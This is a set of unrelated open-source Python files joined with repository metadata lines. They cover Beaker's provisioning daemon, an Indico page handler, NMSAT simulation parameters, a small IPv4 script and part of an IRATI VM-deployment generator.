                    for c in self.commands.itervalues()
                    if c['fqdn'] == command['fqdn']]
            if 'power' in command and command['power'].get('address'):
                # Also wait for other commands running against the same power address
                predecessors.extend(self.greenlets[c['id']]
                        for c in self.commands.itervalues()
                        if 'power' in c and c['power'].get('address')
                            == command['power']['address'])
            self.spawn_handler(command, predecessors)
    def spawn_handler(self, command, predecessors):
        """Run *command* on a new greenlet, after *predecessors* have finished."""
        self.commands[command['id']] = command
        greenlet = gevent.spawn(self.handle, command, predecessors)
        self.greenlets[command['id']] = greenlet
        def completion_callback(greenlet):
            if greenlet.exception:
                logger.error('Command handler %r had unhandled exception: %r',
                        greenlet, greenlet.exception)
            # Forget the command whether it succeeded or failed.
            del self.commands[command['id']]
            del self.greenlets[command['id']]
        greenlet.link(completion_callback)
    def handle(self, command, predecessors):
        """Execute one queued command after all *predecessors* have finished.

        Runs inside its own greenlet (spawned by spawn_handler). Honours the
        optional 'delay' and 'quiescent_period' attributes of *command*,
        dispatches on command['action'], and reports the outcome back to the
        server (running / completed / failed). Returns early, without
        reporting anything, if a shutdown is requested while waiting.
        """
        if command.get('delay'):
            # Before anything else, we need to wait for our delay period.
            # Instead of just doing time.sleep we do a timed wait on
            # shutting_down, so that our delay doesn't hold up the shutdown.
            logger.debug('Delaying %s seconds for command %s',
                    command['delay'], command['id'])
            if shutting_down.wait(timeout=command['delay']):
                return
        gevent.joinall(predecessors)
        if shutting_down.is_set():
            return
        quiescent_period = command.get('quiescent_period')
        if quiescent_period:
            system_fqdn = command.get('fqdn')
            last_command_finished_at = self.last_command_datetime.get(system_fqdn)
            if last_command_finished_at:
                # Get the difference between the time now and the number of
                # seconds until we can run another command
                seconds_to_wait = total_seconds((last_command_finished_at +
                    datetime.timedelta(seconds=quiescent_period)) -
                    datetime.datetime.utcnow())
            else:
                # Play it safe, wait for the whole period.
                seconds_to_wait = quiescent_period
            if seconds_to_wait > 0:
                logger.debug('Entering quiescent period, delaying %s seconds for'
                        ' command %s' % (seconds_to_wait, command['id']))
                if shutting_down.wait(timeout=seconds_to_wait):
                    return
        logger.debug('Handling command %r', command)
        self.mark_command_running(command['id'])
        try:
            # NOTE(review): 'interrupt' lacks the u prefix unlike the other
            # literals here (harmless for ASCII strings).
            if command['action'] in (u'on', u'off', 'interrupt'):
                handle_power(self.conf, command)
            elif command['action'] == u'reboot':
                # For backwards compatibility only. The server now splits
                # reboots into 'off' followed by 'on'.
                handle_power(self.conf, dict(command.items() + [('action', u'off')]))
                time.sleep(5)
                handle_power(self.conf, dict(command.items() + [('action', u'on')]))
            elif command['action'] == u'clear_logs':
                handle_clear_logs(self.conf, command)
            elif command['action'] == u'configure_netboot':
                handle_configure_netboot(command)
            elif command['action'] == u'clear_netboot':
                handle_clear_netboot(command)
            else:
                raise ValueError('Unrecognised action %s' % command['action'])
                # XXX or should we just ignore it and leave it queued?
        except netboot.ImageFetchingError as e:
            logger.exception('Error processing command %s', command['id'])
            # It's not the system's fault so don't mark it as broken
            self.mark_command_failed(command['id'], unicode(e), False)
        except Exception, e:
            logger.exception('Error processing command %s', command['id'])
            self.mark_command_failed(command['id'],
                    '%s: %s' % (e.__class__.__name__, e), True)
        else:
            self.mark_command_completed(command['id'])
        finally:
            if quiescent_period:
                # Remember when we last touched this system, so the next
                # command can honour its quiescent period.
                self.last_command_datetime[command['fqdn']] = datetime.datetime.utcnow()
            logger.debug('Finished handling command %s', command['id'])
def find_power_script(power_type):
    """Locate the executable power script for *power_type*.

    A customised script under /etc/beaker/power-scripts takes precedence
    over the one shipped inside the bkr.labcontroller package. Raises
    ValueError if neither exists.
    """
    custom_path = '/etc/beaker/power-scripts/%s' % power_type
    if os.path.exists(custom_path) and os.access(custom_path, os.X_OK):
        return custom_path
    packaged = 'power-scripts/%s' % power_type
    if not pkg_resources.resource_exists('bkr.labcontroller', packaged):
        raise ValueError('Invalid power type %r' % power_type)
    return pkg_resources.resource_filename('bkr.labcontroller', packaged)
def build_power_env(command):
    """Build the environment for a power script from *command*.

    Copies the current process environment and adds the power_* variables
    (UTF-8 encoded, empty string for missing values).
    """
    env = dict(os.environ)
    power = command['power']
    for env_var, key in (('power_address', 'address'),
                         ('power_id', 'id'),
                         ('power_user', 'user'),
                         ('power_pass', 'passwd')):
        env[env_var] = (power.get(key) or u'').encode('utf8')
    env['power_mode'] = command['action'].encode('utf8')
    return env
def handle_clear_logs(conf, command):
    """Truncate the console log for the system named in *command*.

    A missing console log file is silently ignored; any other I/O error
    propagates. The original version leaked the file handle by never
    closing it; the try/finally guarantees it is closed.
    """
    console_log = os.path.join(conf['CONSOLE_LOGS'], command['fqdn'])
    logger.debug('Truncating console log %s', console_log)
    try:
        f = open(console_log, 'r+')
    except IOError as e:
        if e.errno != errno.ENOENT:
            raise
    else:
        try:
            f.truncate()
        finally:
            f.close()
def handle_configure_netboot(command):
    """Set up all netboot configuration files for the system in *command*."""
    nb = command['netboot']
    netboot.configure_all(command['fqdn'],
                          nb['arch'],
                          nb['distro_tree_id'],
                          nb['kernel_url'],
                          nb['initrd_url'],
                          nb['kernel_options'])
def handle_clear_netboot(command):
    # Remove all netboot configuration previously set up for this system.
    netboot.clear_all(command['fqdn'])
def handle_power(conf, command):
    """Run the external power script for *command*, retrying on failure.

    Up to conf['POWER_ATTEMPTS'] attempts are made, with randomised
    exponential backoff between attempts. Raises ValueError if the script
    still exits non-zero after the final attempt; the power password (if
    any) is masked out of the error message.
    """
    from bkr.labcontroller.async import MonitoredSubprocess
    script = find_power_script(command['power']['type'])
    env = build_power_env(command)
    # We try the command up to 5 times, because some power commands
    # are flakey (apparently)...
    for attempt in range(1, conf['POWER_ATTEMPTS'] + 1):
        if attempt > 1:
            # After the first attempt fails we do a randomised exponential
            # backoff in the style of Ethernet.
            # Instead of just doing time.sleep we do a timed wait on
            # shutting_down, so that our delay doesn't hold up the shutdown.
            delay = random.uniform(attempt, 2**attempt)
            logger.debug('Backing off %0.3f seconds for power command %s',
                    delay, command['id'])
            if shutting_down.wait(timeout=delay):
                break
        logger.debug('Launching power script %s (attempt %s) with env %r',
                script, attempt, env)
        # N.B. the timeout value used here affects daemon shutdown time,
        # make sure the init script is kept up to date!
        p = MonitoredSubprocess([script], env=env,
                stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                timeout=300)
        logger.debug('Waiting on power script pid %s', p.pid)
        p.dead.wait()
        output = p.stdout_reader.get()
        if p.returncode == 0 or shutting_down.is_set():
            break
    # NOTE(review): if shutdown interrupts the retry loop after a failed
    # attempt, the last non-zero exit status still raises here.
    if p.returncode != 0:
        sanitised_output = output[:150].strip()
        if command['power'].get('passwd'):
            sanitised_output = sanitised_output.replace(
                    command['power']['passwd'], '********')
        raise ValueError('Power script %s failed after %s attempts with exit status %s:\n%s'
                % (script, attempt, p.returncode, sanitised_output))
    # TODO submit complete stdout and stderr?
def shutdown_handler(signum, frame):
    # Installed for SIGINT and SIGTERM (see main_loop): request a graceful
    # shutdown by setting the module-level shutting_down event.
    logger.info('Received signal %s, shutting down', signum)
    shutting_down.set()
def main_loop(poller=None, conf=None):
    """Run the provisioning daemon's main loop until a shutdown signal.

    Installs SIGINT/SIGTERM handlers, clears stale commands, then polls
    *poller* every conf['SLEEP_TIME'] (default 20) seconds. On shutdown,
    waits for running greenlets to terminate before returning.
    """
    global shutting_down
    shutting_down = gevent.event.Event()
    gevent.monkey.patch_all(thread=False)
    # define custom signal handlers
    signal.signal(signal.SIGINT, shutdown_handler)
    signal.signal(signal.SIGTERM, shutdown_handler)
    logger.debug('Copying default boot loader images')
    netboot.copy_default_loader_images()
    logger.debug('Clearing old running commands')
    poller.clear_running_commands(u'Stale command cleared on startup')
    logger.debug('Entering main provision loop')
    while True:
        try:
            poller.poll()
        except Exception:
            # Polling failures are logged and retried on the next pass.
            # (Was a bare except:, which also swallowed SystemExit and
            # KeyboardInterrupt.)
            logger.exception('Failed to poll for queued commands')
        if shutting_down.wait(timeout=conf.get('SLEEP_TIME', 20)):
            gevent.hub.get_hub().join() # let running greenlets terminate
            break
    logger.debug('Exited main provision loop')
def main():
    """Parse command-line options, set up logging, and start the daemon.

    Runs in the foreground with -f, otherwise daemonises with a pid file.
    Exits with status 1 if the command queue poller cannot be created.
    """
    parser = OptionParser()
    parser.add_option("-c", "--config",
                      help="Full path to config file to use")
    parser.add_option("-f", "--foreground", default=False, action="store_true",
                      help="run in foreground (do not spawn a daemon)")
    parser.add_option("-p", "--pid-file",
                      help="specify a pid file")
    (opts, args) = parser.parse_args()
    if opts.config:
        load_conf(opts.config)
    logging.getLogger().setLevel(logging.DEBUG)
    conf = get_conf()
    pid_file = opts.pid_file
    if pid_file is None:
        pid_file = conf.get("PROVISION_PID_FILE", "/var/run/beaker-lab-controller/beaker-provision.pid")
    # HubProxy will try to log some stuff, even though we
    # haven't configured our logging handlers yet. So we send logs to stderr
    # temporarily here, and configure it again below.
    log_to_stream(sys.stderr, level=logging.WARNING)
    try:
        poller = CommandQueuePoller(conf=conf)
    # 'as' form for consistency with the rest of the file (old-style
    # 'except Exception, ex' is Python-2-only syntax).
    except Exception as ex:
        sys.stderr.write('Error starting beaker-provision: %s\n' % ex)
        sys.exit(1)
    if opts.foreground:
        log_to_stream(sys.stderr, level=logging.DEBUG)
        main_loop(poller=poller, conf=conf)
    else:
        # See BZ#977269
        poller.close()
        with daemon.DaemonContext(pidfile=pidfile.TimeoutPIDLockFile(
                pid_file, acquire_timeout=0), detach_process=True):
            log_to_syslog('beaker-provision')
            try:
                main_loop(poller=poller, conf=conf)
            except Exception:
                logger.exception('Unhandled exception in main_loop')
                raise
# Entry point when run as a script (beaker-provision daemon).
if __name__ == '__main__':
    main()
| jtoppins/beaker | LabController/src/bkr/labcontroller/provision.py | Python | gpl-2.0 | 14,901 |
from MaKaC.webinterface.rh import conferenceDisplay
def index(req, **params):
    """Serve the abstract book page via the display request handler."""
    handler = conferenceDisplay.RHAbstractBook(req)
    return handler.process(params)
def test(req, **params):
    """Identical to index(): serve the abstract book page."""
    handler = conferenceDisplay.RHAbstractBook(req)
    return handler.process(params)
| belokop-an/agenda-tools | code/htdocs/confAbstractBook.py | Python | gpl-2.0 | 233 |
__author__ = 'duarte'
import sys
from preset import *
import numpy as np
"""
spike_noise_input
- standard network setup, driven with noisy, Poissonian input
- quantify and set population state
- run with noise_driven_dynamics in computations
- debug with noise_driven_dynamics script
"""
# Execution target, passed as run_type to set_kernel_defaults().
run = 'local'
# Label identifying this experiment's output data, passed to set_kernel_defaults().
data_label = 'example3_population_noisedriven'
def build_parameters(g, nu_x):
	"""
	Build the complete parameter set for one noise-driven network simulation.

	:param g: relative inhibitory synaptic strength (inhibitory weight is
	          wI = -g * wE)
	:param nu_x: per-afferent external input rate; the total Poisson rate is
	             nu_x * k_x, with k_x = pEE * nE external inputs
	:return: dict of parameter dictionaries (kernel_pars, neuron_pars,
	         net_pars, encoding_pars, connection_pars, analysis_pars)
	"""
	# ##################################################################################################################
	# System / Kernel Parameters
	# ##################################################################################################################
	system = dict(
		nodes=1,
		ppn=16,
		mem=64000,
		walltime='01-00:00:00',
		queue='defqueue',
		transient_time=1000.,
		sim_time=500.)
	kernel_pars = set_kernel_defaults(run_type=run, data_label=data_label, **system)
	np.random.seed(kernel_pars['np_seed'])
	# ##################################################################################################################
	# Neuron, Synapse and Network Parameters
	# ##################################################################################################################
	N = 10000
	nE = 0.8 * N
	nI = 0.2 * N
	dE = 1.0
	dI = 0.8
	# Connection probabilities
	pEE = 0.1
	pEI = 0.2
	pIE = 0.1
	pII = 0.2
	# connection weights
	# g = 13.5
	wE = 1.2
	wI = -g * wE
	recurrent_synapses = dict(
		connected_populations=[('E', 'E'), ('E', 'I'), ('I', 'E'), ('I', 'I')],
		synapse_models=['static_synapse', 'static_synapse', 'static_synapse', 'static_synapse'],
		synapse_model_parameters=[{}, {}, {}, {}],
		pre_computedW=[None, None, None, None],
		weights=[{'distribution': 'normal_clipped', 'mu': wE, 'sigma': 0.5 * wE, 'low': 0.0001, 'high': 10. * wE},
		         {'distribution': 'normal_clipped', 'mu': wI, 'sigma': np.abs(0.5 * wI), 'low': 10. * wI, 'high': 0.0001},
		         {'distribution': 'normal_clipped', 'mu': wE, 'sigma': 0.5 * wE, 'low': 0.0001, 'high': 10. * wE},
		         {'distribution': 'normal_clipped', 'mu': wI, 'sigma': np.abs(0.5 * wI), 'low': 10. * wI, 'high': 0.0001}],
		delays=[{'distribution': 'normal_clipped', 'mu': dE, 'sigma': 0.5 * dE, 'low': 0.1, 'high': 10. * dE},
		        {'distribution': 'normal_clipped', 'mu': dI, 'sigma': 0.5 * dI, 'low': 0.1, 'high': 10. * dI},
		        {'distribution': 'normal_clipped', 'mu': dE, 'sigma': 0.5 * dE, 'low': 0.1, 'high': 10. * dE},
		        {'distribution': 'normal_clipped', 'mu': dI, 'sigma': 0.5 * dI, 'low': 0.1, 'high': 10. * dI}],
		conn_specs=[{'rule': 'pairwise_bernoulli', 'p': pEE},
		            {'rule': 'pairwise_bernoulli', 'p': pEI},
		            {'rule': 'pairwise_bernoulli', 'p': pIE},
		            {'rule': 'pairwise_bernoulli', 'p': pII}],
		syn_specs=[{}, {}, {}, {}])
	neuron_pars, net_pars, connection_pars = set_network_defaults(neuron_set=1, N=N, **recurrent_synapses)
	net_pars['record_analogs'] = [True, False]
	multimeter = rec_device_defaults(device_type='multimeter')
	multimeter.update({'record_from': ['V_m', 'g_ex', 'g_in'], 'record_n': 1})
	net_pars['analog_device_pars'] = [copy_dict(multimeter, {'label': ''}), {}]
	# ######################################################################################################################
	# Encoding Parameters
	# ######################################################################################################################
	# nu_x = 20.
	k_x = pEE * nE
	w_in = 1.
	encoding_pars = set_encoding_defaults(default_set=0)
	background_noise = dict(
		start=0., stop=sys.float_info.max, origin=0.,
		rate=nu_x*k_x, target_population_names=['E', 'I'],
		additional_parameters={
			'syn_specs': {},
			'models': 'static_synapse',
			'model_pars': {},
			'weight_dist': {'distribution': 'normal_clipped', 'mu': w_in, 'sigma': 0.5*w_in, 'low': 0.0001,
			                'high': 10.*w_in},
			'delay_dist': 0.1})
	add_background_noise(encoding_pars, background_noise)
	# ##################################################################################################################
	# Extra analysis parameters (specific for this experiment)
	# ==================================================================================================================
	analysis_pars = {
		# analysis depth
		'depth': 2,  	# 1: save only summary of data, use only fastest measures
						# 2: save all data, use only fastest measures
						# 3: save only summary of data, use all available measures
						# 4: save all data, use all available measures
		'store_activity': False,  	# [int] - store all population activity in the last n steps of the test
									# phase; if set True the entire test phase will be stored;
		'population_activity': {
			'time_bin': 1.,  		# bin width for spike counts, fano factors and correlation coefficients
			'n_pairs': 500,  		# number of spike train pairs to consider in correlation coefficient
			'tau': 20.,  			# time constant of exponential filter (van Rossum distance)
			'window_len': 100,  	# length of sliding time window (for time_resolved analysis)
			'time_resolved': False, # perform time-resolved analysis
		}
	}
	# ##################################################################################################################
	# RETURN dictionary of Parameters dictionaries
	# ==================================================================================================================
	return dict([('kernel_pars', kernel_pars),
	             ('neuron_pars', neuron_pars),
	             ('net_pars', net_pars),
	             ('encoding_pars', encoding_pars),
	             ('connection_pars', connection_pars),
	             ('analysis_pars', analysis_pars)])
# ######################################################################################################################
# PARAMETER RANGE declarations
# ======================================================================================================================
# Values to sweep for each argument of build_parameters(); presumably the
# framework runs one simulation per combination — confirm with the runner.
parameter_range = {
	'g': [11.],
	'nu_x': [14.]
}
| rcfduarte/nmsat | projects/examples/parameters/noise_driven_dynamics.py | Python | gpl-2.0 | 6,567 |
#!/usr/bin/python
# Validate a hard-coded IPv4 address and print its 32-bit binary form.
# (The original wrapped the check in `while True: ... continue`, which
# looped forever on an invalid address since the input never changes.)
my_ip = "192.168.1.100"
my_subnet = "255.255.255.0"

ip = my_ip.split(".")
print(ip)

# Check the validity of the ip address: first octet must be a unicast
# class A-C value (<= 223), not link-local 169.254.x.x, and every other
# octet within range.
octets = [int(o) for o in ip]
if (octets[0] <= 223
        and not (octets[1] == 169 and octets[2] == 254)
        and octets[1] <= 254 and octets[2] <= 254 and octets[3] <= 254):
    print("You entered a valid ip")
else:
    print("You entered a wrong ip")

# Concatenate each octet as an 8-bit binary string.
bin_ip = ""
for a in ip:
    print(bin(int(a)).split("b")[1].zfill(8))
    bin_ip += bin(int(a)).split("b")[1].zfill(8)
print(bin_ip)
print(type(bin_ip))
| hiteshagrawal/python | networking/subnet-cal.py | Python | gpl-2.0 | 620 |
#!/usr/bin/env python
#
# Copyright (C) 2014-2017 Nextworks
# Author: Vincenzo Maffione <v.maffione@nextworks.it>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# A tool for live demonstrations and regression testing for the IRATI stack
import multiprocessing
import gen_templates
import subprocess
import argparse
import json
import copy
import re
import os
def which(program):
    """Exit with status 1 if *program* cannot be found in PATH.

    Uses the external `which` utility; its output is discarded. The
    original version leaked the os.devnull handle.
    """
    with open(os.devnull, 'w') as fnull:
        retcode = subprocess.call(['which', program], stdout=fnull,
                                  stderr=subprocess.STDOUT)
    if retcode != 0:
        print('Fatal error: Cannot find "%s" program' % program)
        quit(1)
def dict_dump_json(file_name, dictionary, env_dict):
    """Serialise *dictionary* to pretty-printed JSON, substitute %-style
    placeholders from *env_dict*, and write the result to *file_name*.
    """
    dictionary_str = json.dumps(dictionary, indent=4,
                                sort_keys=True) % env_dict
    # 'with' guarantees the file is closed even if the write fails
    # (the original never used a context manager).
    with open(file_name, 'w') as fout:
        fout.write(dictionary_str)
def joincat(haystack, needle):
    """Return *needle* prepended to *haystack*, separated by a single space."""
    return needle + ' ' + haystack
def netem_validate(netem_args):
    """Return True if *netem_args* are accepted by `tc qdisc ... netem`.

    Creates a throwaway tap device as a probe, tries to attach the netem
    qdisc to it, then removes the device again. Requires sudo. The original
    leaked the devnull handle on the failure path, used a bare `except:`,
    and skipped the tap cleanup if interrupted; cleanup now runs in a
    `finally` block.
    """
    ret = True
    try:
        with open(os.devnull, 'w') as fdevnull:
            subprocess.check_call('sudo ip tuntap add mode tap name tapiratiprobe'.split())
            subprocess.check_call(('sudo tc qdisc add dev '\
                                   'tapiratiprobe root netem %s'\
                                   % netem_args).split(), stdout=fdevnull,
                                  stderr=fdevnull)
    except Exception:
        ret = False
    finally:
        # Always remove the probe tap device, even on unexpected errors.
        subprocess.call('sudo ip tuntap del mode tap name tapiratiprobe'.split())
    return ret
description = "Python script to generate IRATI deployments for Virtual Machines"
epilog = "2016 Vincenzo Maffione <v.maffione@nextworks.it>"
argparser = argparse.ArgumentParser(description = description,
epilog = epilog)
argparser.add_argument('-c', '--conf',
help = "gen.conf configuration file", type = str,
default = 'gen.conf')
argparser.add_argument('-g', '--graphviz', action='store_true',
help = "Generate DIF graphs with graphviz")
argparser.add_argument('--legacy', action='store_true',
help = "Use qcow2 image rather than buildroot ramfs")
argparser.add_argument('-m', '--memory',
help = "Amount of memory in megabytes", type = int,
default = '164')
argparser.add_argument('-e', '--enrollment-strategy',
help = "Minimal uses a spanning tree of each DIF",
type = str, choices = ['minimal', 'full-mesh', 'manual'],
default = 'minimal')
argparser.add_argument('--ring',
help = "Use ring topology with variable number of nodes",
type = int)
argparser.add_argument('--kernel',
help = "custom kernel buildroot image", type = str,
default = 'buildroot/bzImage')
argparser.add_argument('--initramfs',
help = "custom initramfs buildroot image", type = str,
default = 'buildroot/rootfs.cpio')
argparser.add_argument('-f', '--frontend',
help = "Choose which emulated NIC the nodes will use",
type = str, choices = ['virtio-net-pci', 'e1000'],
default = 'virtio-net-pci')
argparser.add_argument('--vhost', action='store_true',
help = "Use vhost acceleration for virtio-net frontend")
argparser.add_argument('--manager', action='store_true',
help = "Add support for NMS manager and dedicated LAN")
argparser.add_argument('--manager-kernel',
help = "custom kernel buildroot image for the manager",
type = str, default = 'buildroot/bzImage')
argparser.add_argument('--manager-initramfs',
help = "custom initramfs buildroot image for the manager",
type = str, default = 'buildroot/rootfs.cpio')
argparser.add_argument('--overlay',
help = "Overlay the specified directory in the generated image",
type = str)
argparser.add_argument('--loglevel',
help = "Set verbosity level",
choices = ['DBG', 'INFO', 'NOTE', 'WARN', 'ERR', 'CRIT', 'ALERT', 'EMERG'],
default = 'DBG')
args = argparser.parse_args()
which('brctl')
which('qemu-system-x86_64')
subprocess.call(['chmod', '0400', 'buildroot/irati_rsa'])
if args.overlay:
args.overlay = os.path.abspath(args.overlay)
if not os.path.isdir(args.overlay):
args.overlay = None
if args.legacy:
sshopts = ''
sudo = 'sudo'
else:
sshopts = '-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null '\
'-o IdentityFile=buildroot/irati_rsa'
sudo = ''
if args.legacy:
######################## Compile mac2ifname program ########################
try:
subprocess.call(['cc', '-Wall', '-o', 'mac2ifname', 'mac2ifname.c'])
except:
print('Cannot find a C compiler to compile mac2ifname program')
quit(1)
env_dict = {}
keywords = ['vmimgpath', 'installpath', 'username', 'baseport']
############################## Parse gen.env ###############################
fin = open('gen.env', 'r')
while 1:
line = fin.readline()
if line == '':
break
m = re.match(r'(\S+)\s*=\s*(\S+)', line)
if m == None:
continue
key = m.group(1)
value = m.group(2)
if key not in keywords:
print('Unrecognized keyword %s' % (key))
continue
env_dict[key] = value
fin.close()
for key in keywords:
if key not in env_dict:
print("Configuration variables missing")
quit(1)
env_dict['baseport'] = int(env_dict['baseport'])
env_dict['varpath'] = env_dict['installpath']
if not args.legacy:
# overwrite vmimgpath, installpath, varpath, username
env_dict['vmimgpath'] = args.initramfs
env_dict['installpath'] = '/usr'
env_dict['varpath'] = ''
env_dict['username'] = 'root'
# Possibly autogenerate ring topology
if args.ring != None and args.ring > 0:
print("Ignoring %s, generating ring topology" % (args.conf,))
fout = open('ring.conf', 'w')
for i in range(args.ring):
i_next = i + 1
if i_next == args.ring:
i_next = 0
fout.write('eth %(vlan)s 0Mbps m%(i)s m%(inext)s\n' % \
{'i': i+1, 'inext': i_next+1, 'vlan': i+1+100})
for i in range(args.ring):
i_prev = i - 1
if i_prev < 0:
i_prev = args.ring - 1
fout.write('dif n m%(i)s %(vlan)s %(vprev)s\n' % \
{'i': i+1, 'vlan': i+1+100, 'vprev': i_prev+1+100})
fout.close()
args.conf = 'ring.conf'
# Some constants related to the RINA management
injected_lines = []
mgmt_shim_dif_name = '3456'
mgmt_dif_name = 'NMS'
mgmt_node_name = 'mgr'
if not os.path.exists(args.conf):
print("Error: %s not found" % args.conf)
quit()
# Try to check that gen.conf is ASCII
try:
o = subprocess.check_output(['file', args.conf])
o = str(o).upper()
if o.find('ASCII') == -1:
print("Error: %s is not ASCII encoded" % args.conf)
quit()
except Exception as e:
print(e)
pass
############################# Parse gen.conf ##############################
fin = open(args.conf, 'r')
vms = dict()
shims = dict()
links = []
difs = dict()
enrollments = dict()
dif_policies = dict()
dif_graphs = dict()
app_mappings = []
overlays = dict()
netems = dict()
manual_enrollments = dict()
linecnt = 0
conf_injection = True
while 1:
try:
line = fin.readline()
except UnicodeDecodeError:
print("Error: demo.conf must be ASCII encoded")
quit()
if line == '':
# EOF, try to pick from injected lines
if len(injected_lines) > 0:
line = injected_lines.pop(0)
if line == '':
if not conf_injection:
# Injection already done, let's stop now
break
# Inject new lines and continue
conf_injection = False
if args.manager:
vm_list = [vmname for vmname in sorted(vms)]
vm_list.append(mgmt_node_name) # a VM for the manager
injected_lines.append('eth %s 0Mbps %s' % (mgmt_shim_dif_name, ' '.join(vm_list)))
for vmname in vm_list:
injected_lines.append('dif %s %s %s' % (mgmt_dif_name, vmname, mgmt_shim_dif_name))
continue
linecnt += 1
line = line.replace('\n', '')
if line.startswith('#'):
continue
if re.match(r'\s*$', line):
continue
m = re.match(r'\s*eth\s+(\d+)\s+(\d+)([GMK])bps\s+(\w.*)$', line)
if m:
vlan = m.group(1)
speed = int(m.group(2))
speed_unit = m.group(3).lower()
vm_list = m.group(4).split()
if vlan in shims:
print('Error: Line %d: shim %s already defined' \
% (linecnt, vlan))
continue
shims[vlan] = {'bridge': 'rbr' + vlan, 'vlan': vlan, 'speed': speed,
'speed_unit': speed_unit}
for vm in vm_list:
if vm not in vms:
vms[vm] = {'name': vm, 'ports': []}
links.append((vlan, vm))
#for i in range(len(vm_list)-1):
# for j in range(i + 1, len(vm_list)):
# print(vm_list[i], vm_list[j])
continue
m = re.match(r'\s*dif\s+([\w-]+)\s+([\w-]+)\s+([\w-].*)$', line)
if m:
dif = m.group(1)
vm = m.group(2)
dif_list = m.group(3).split()
if vm not in vms:
vms[vm] = {'name': vm, 'ports': []}
if dif not in difs:
difs[dif] = dict()
if vm in difs[dif]:
print('Error: Line %d: vm %s in dif %s already specified' \
% (linecnt, vm, dif))
continue
difs[dif][vm] = dif_list
continue
m = re.match(r'\s*policy\s+([\w-]+)\s+(\*|(?:(?:[\w-]+,)*[\w-]+))\s+([*\w.-]+)\s+([\w-]+)((?:\s+[\w.-]+\s*=\s*[/\w.-]+)*)\s*$', line)
if m:
dif = m.group(1)
nodes = m.group(2)
path = m.group(3)
ps = m.group(4)
parms = list()
if m.group(5) != None:
parms_str = m.group(5).strip()
if parms_str != '':
parms = parms_str.split(' ')
if dif not in dif_policies:
dif_policies[dif] = []
if nodes == '*':
nodes = []
else:
nodes = nodes.split(',')
dif_policies[dif].append({'path': path, 'nodes': nodes,
'ps': ps, 'parms' : parms})
if not gen_templates.policy_path_valid(path):
print('Unknown component path "%s"' % path)
quit(1)
continue
m = re.match(r'\s*appmap\s+([\w-]+)\s+([\w.]+)\s+(\d+)\s*$', line)
if m:
dif = m.group(1)
apname = m.group(2)
apinst = m.group(3)
app_mappings.append({'name': '%s-%s--' % (apname, apinst), 'dif' : dif})
continue
m = re.match(r'\s*overlay\s+([\w-]+)\s+([\w.-/]+\s*$)', line)
if m:
vmname = m.group(1)
opath = m.group(2)
opath = os.path.abspath(opath)
if not os.path.isdir(opath):
print("Error: line %d: no such overlay path" % linecnt)
continue
overlays[vmname] = opath
continue
m = re.match(r'\s*netem\s+(\d+)\s+([\w-]+)\s+(\w.*)$', line)
if m:
dif = m.group(1)
vmname = m.group(2)
netem_args = m.group(3)
if dif not in netems:
netems[dif] = dict()
netems[dif][vmname] = {'args': netem_args, 'linecnt': linecnt}
continue
m = re.match(r'\s*enroll\s+([\w.-]+)\s+([\w.-]+)\s+([\w.-]+)\s+([\w.-]+)\s*$', line)
if m:
if args.enrollment_strategy != 'manual':
print('Warning: ignoring enroll directive at line %d' % linecnt)
continue
dif_name = m.group(1)
enrollee = m.group(2)
enroller = m.group(3)
n_1_dif = m.group(4)
if dif_name not in manual_enrollments:
manual_enrollments[dif_name] = []
manual_enrollments[dif_name].append({
'enrollee': enrollee,
'enroller': enroller,
'lower_dif': n_1_dif,
'linecnt': linecnt})
continue
print("Error: line %d not recognized" % linecnt)
quit()
fin.close()
for dif in difs:
if dif not in dif_policies:
dif_policies[dif] = []
boot_batch_size = max(1, multiprocessing.cpu_count() / 2)
wait_for_boot = 12 # in seconds
if len(vms) > 8:
print("You want to run a lot of nodes, so it's better if I give "
"each node some time to boot (since the boot is CPU-intensive)")
############ Compute registration/enrollment order for DIFs ###############
# Compute DIFs dependency graph, as both adjacency and incidence list.
difsdeps_adj = dict()
difsdeps_inc = dict()
for dif in difs:
difsdeps_inc[dif] = set()
difsdeps_adj[dif] = set()
for shim in shims:
difsdeps_inc[shim] = set()
difsdeps_adj[shim] = set()
for dif in difs:
for vmname in difs[dif]:
for lower_dif in difs[dif][vmname]:
difsdeps_inc[dif].add(lower_dif)
difsdeps_adj[lower_dif].add(dif)
# Kahn's algorithm below only needs per-node count of
# incident edges, so we compute these counts from the
# incidence list and drop the latter.
difsdeps_inc_cnt = dict()
for dif in difsdeps_inc:
difsdeps_inc_cnt[dif] = len(difsdeps_inc[dif])
del difsdeps_inc
#print(difsdeps_adj)
#print(difsdeps_inc_cnt)
# Run Kahn's algorithm to compute topological ordering on the DIFs graph.
frontier = set()
dif_ordering = []
for dif in difsdeps_inc_cnt:
if difsdeps_inc_cnt[dif] == 0:
frontier.add(dif)
while len(frontier):
cur = frontier.pop()
dif_ordering.append(cur)
for nxt in difsdeps_adj[cur]:
difsdeps_inc_cnt[nxt] -= 1
if difsdeps_inc_cnt[nxt] == 0:
frontier.add(nxt)
difsdeps_adj[cur] = set()
circular_set = [dif for dif in difsdeps_inc_cnt if difsdeps_inc_cnt[dif] != 0]
if len(circular_set):
print("Fatal error: The specified DIFs topology has one or more"\
"circular dependencies, involving the following"\
" DIFs: %s" % circular_set)
print(" DIFs dependency graph: %s" % difsdeps_adj);
quit(1)
####################### Compute DIF graphs #######################
for dif in difs:
neighsets = dict()
dif_graphs[dif] = dict()
first = None
# For each N-1-DIF supporting this DIF, compute the set of nodes that
# share such N-1-DIF. This set will be called the 'neighset' of
# the N-1-DIF for the current DIF.
for vmname in difs[dif]:
dif_graphs[dif][vmname] = [] # init for later use
if first == None: # pick any node for later use
first = vmname
for lower_dif in difs[dif][vmname]:
if lower_dif not in neighsets:
neighsets[lower_dif] = []
neighsets[lower_dif].append(vmname)
# Build the graph, represented as adjacency list
for lower_dif in neighsets:
# Each neighset corresponds to a complete (sub)graph.
for vm1 in neighsets[lower_dif]:
for vm2 in neighsets[lower_dif]:
if vm1 != vm2:
dif_graphs[dif][vm1].append((vm2, lower_dif))
enrollments[dif] = []
